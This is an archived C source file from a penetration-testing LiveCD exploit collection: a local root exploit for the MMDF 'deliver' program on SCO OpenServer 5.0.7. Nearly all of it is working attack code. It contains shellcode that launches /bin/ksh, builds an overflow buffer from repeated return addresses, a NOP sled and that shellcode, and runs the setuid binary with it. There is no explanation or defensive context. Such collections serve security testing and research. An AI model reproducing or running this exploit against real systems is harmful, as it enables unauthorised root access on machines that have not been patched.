home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / sco / local / SCODeliverExploit.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  45 lines

  1. /*
  2.  *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
  3.  *  Copyright 2004 Ramon de Carvalho Valle
  4.  *
  5.  */
  6.  
  7. char shellcode[]=           /*  36 bytes                          */
  8.     "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
  9.     "\x6a\x65"              /*  pushl   $0x65                     */
  10.     "\x89\xe6"              /*  movl    %esp,%esi                 */
  11.     "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
  12.     "\xf6\x16"              /*  notb    (%esi)                    */
  13.     "\x31\xc0"              /*  xorl    %eax,%eax                 */
  14.     "\x50"                  /*  pushl   %eax                      */
  15.     "\x68""/ksh"            /*  pushl   $0x68736b2f               */
  16.     "\x68""/bin"            /*  pushl   $0x6e69622f               */
  17.     "\x89\xe3"              /*  movl    %esp,%ebx                 */
  18.     "\x50"                  /*  pushl   %eax                      */
  19.     "\x50"                  /*  pushl   %eax                      */
  20.     "\x53"                  /*  pushl   %ebx                      */
  21.     "\xb0\x3b"              /*  movb    $0x3b,%al                 */
  22.     "\xff\xd6"              /*  call    *%esi                     */
  23. ;
  24.  
  25. main(int argc,char **argv) {
  26.     char buffer[16384],address[4],*p;
  27.     int i;
  28.  
  29.     printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86\n");
  30.     printf("Copyright 2004 Ramon de Carvalho Valle\n\n");
  31.  
  32.     *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;
  33.  
  34.     sprintf(buffer,"-c");
  35.     p=buffer+2;
  36.     for(i=0;i<5120;i++) *p++=address[i%4];
  37.     for(i=0;i<8192;i++) *p++=0x90;
  38.     for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
  39.     *p=0;
  40.  
  41.     execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
  42. }
  43.  
  44.  
  45.